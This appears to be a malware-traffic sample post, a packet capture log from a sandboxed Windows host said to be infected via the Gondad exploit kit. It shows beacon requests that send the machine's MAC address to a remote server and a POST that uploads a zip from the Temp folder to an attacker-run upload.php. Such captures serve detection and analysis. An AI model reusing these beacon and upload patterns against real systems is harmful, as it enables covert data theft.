Gondad EK Exploit Kit using QQ.com Malware Infection PCAP Traffic Sample

June 22, 2015

2014-12-13 21:12:18.365748 IP 192.168.56.101.1389 > 8.8.8.8.53: 37206+ A? r.qzone.qq.com. (32)
2014-12-13 21:12:18.426615 IP 8.8.8.8.53 > 192.168.56.101.1389: 37206 4/0/0 CNAME qq.com.edgesuite.net., CNAME a1574.b.akamai.net., A 23.61.194.48, A 23.61.194.216 (127)
2014-12-13 21:12:18.431687 IP 192.168.56.101.1040 > 23.61.194.48.80: Flags [S], seq 759589942, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2014-12-13 21:12:18.435525 IP 23.61.194.48.80 > 192.168.56.101.1040: Flags [S.], seq 3705922240, ack 759589943, win 14600, options [mss 1260,nop,nop,sackOK], length 0
2014-12-13 21:12:18.435848 IP 192.168.56.101.1040 > 23.61.194.48.80: Flags [.], ack 1, win 64240, length 0
2014-12-13 21:12:18.438208 IP 192.168.56.101.1040 > 23.61.194.48.80: Flags [P.], seq 1:404, ack 1, win 64240, length 403
GET /cgi-bin/user/cgi_personal_card?uin=3052346108?=6330 HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: r.qzone.qq.com
Connection: Keep-Alive
2014-12-13 21:12:18.441934 IP 23.61.194.48.80 > 192.168.56.101.1040: Flags [.], ack 404, win 15544, length 0
2014-12-13 21:12:18.669656 IP 23.61.194.48.80 > 192.168.56.101.1040: Flags [P.], seq 1:472, ack 404, win 15544, length 471
HTTP/1.1 200 OK
Server: QZHTTP-2.38.18
Content-Encoding: gzip
Cache-Control: max-age=10800
Content-Type: application/x-javascript; charset=utf-8
ETag: "1357066188"
Content-Length: 194
Date: Sun, 14 Dec 2014 01:14:09 GMT
Connection: keep-alive
Vary: Accept-Encoding

2014-12-13 21:12:18.696983 IP 192.168.56.101.137 > 192.168.56.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
2014-12-13 21:12:18.696989 IP 192.168.56.101.137 > 192.168.56.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
2014-12-13 21:12:18.746548 IP 192.168.56.101.1041 > 23.248.253.254.80: Flags [S], seq 4204432804, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2014-12-13 21:12:18.758293 IP 23.248.253.254.80 > 192.168.56.101.1041: Flags [S.], seq 2147096055, ack 4204432805, win 16384, options [mss 1260,nop,nop,sackOK], length 0
2014-12-13 21:12:18.758652 IP 192.168.56.101.1041 > 23.248.253.254.80: Flags [.], ack 1, win 64240, length 0
2014-12-13 21:12:18.759177 IP 192.168.56.101.1041 > 23.248.253.254.80: Flags [P.], seq 1:280, ack 1, win 64240, length 279
Get /Count.asp?ver=001&mac=08-00-27-8F-E3-EB HTTP/1.1
Accept-Language: zh-CN
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 23.248.253.254
Content-Length: 0
Connection: Keep-Alive
2014-12-13 21:12:18.787196 IP 192.168.56.101.1040 > 23.61.194.48.80: Flags [.], ack 472, win 63769, length 0
2014-12-13 21:12:18.818887 IP 23.248.253.254.80 > 192.168.56.101.1041: Flags [P.], seq 1:271, ack 280, win 65256, length 270
HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Sun, 14 Dec 2014 01:14:11 GMT
Connection: Keep-Alive
Set-Cookie: JKQABTJMCKRYPPRMIHAA=FUMSTIKJLEGHCRKECKKYMVVHWRLTQRTKNKIDAPRK; path=/
Cache-control: private
Content-Type: text/html
Content-Length: 0
2014-12-13 21:12:18.838646 IP 192.168.56.101.1042 > 182.16.30.187.80: Flags [S], seq 3561090013, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2014-12-13 21:12:18.987347 IP 192.168.56.101.1041 > 23.248.253.254.80: Flags [.], ack 271, win 63970, length 0
2014-12-13 21:12:18.998616 IP 182.16.30.187.80 > 192.168.56.101.1042: Flags [S.], seq 3226440986, ack 3561090014, win 16384, options [mss 1260,nop,nop,sackOK], length 0
2014-12-13 21:12:18.998976 IP 192.168.56.101.1042 > 182.16.30.187.80: Flags [.], ack 1, win 64240, length 0
2014-12-13 21:12:18.999985 IP 192.168.56.101.1042 > 182.16.30.187.80: Flags [P.], seq 1:364, ack 1, win 64240, length 363
GET /ip.php?=8256 HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 182.16.30.187
Connection: Keep-Alive
2014-12-13 21:12:19.160735 IP 182.16.30.187.80 > 192.168.56.101.1042: Flags [P.], seq 1:277, ack 364, win 65172, length 276
HTTP/1.1 200 OK
Date: Sun, 14 Dec 2014 01:14:21 GMT
Server: Apache/2.2.4 (Win32) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Content-Length: 32
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: ko

5d8bf0771ea8586271af714a6119c022
2014-12-13 21:12:19.287408 IP 192.168.56.101.1042 > 182.16.30.187.80: Flags [.], ack 277, win 63964, length 0
2014-12-13 21:12:19.859217 IP 192.168.56.101.138 > 192.168.56.255.138: NBT UDP PACKET(138)
2014-12-13 21:12:19.859232 IP 192.168.56.101.138 > 192.168.56.255.138: NBT UDP PACKET(138)
2014-12-13 21:12:21.347539 IP 192.168.56.101.1042 > 182.16.30.187.80: Flags [P.], seq 364:1140, ack 277, win 63964, length 776
POST /upload.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://182.16.30.187/upload.php
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7da3e1bd0314
Content-Length: 291
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 182.16.30.187
Cache-Control: no-cache

-----------------------------7da3e1bd0314
Content-Disposition: form-data; name="upload_file1"; filename="C:\DOCUME~1\User\LOCALS~1\Temp\eafbb777ecea145c0caadf054ab3dc51.zip"
Content-Type: application/x-zip-compressed

PK………………..
-----------------------------7da3e1bd0314--

2014-12-13 21:12:21.508854 IP 182.16.30.187.80 > 192.168.56.101.1042: Flags [P.], seq 277:478, ack 1140, win 64396, length 201
HTTP/1.1 200 OK
Date: Sun, 14 Dec 2014 01:14:24 GMT
Server: Apache/2.2.4 (Win32) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Content-Length: 0
Content-Type: text/html;charset=utf-8
Content-Language: ko
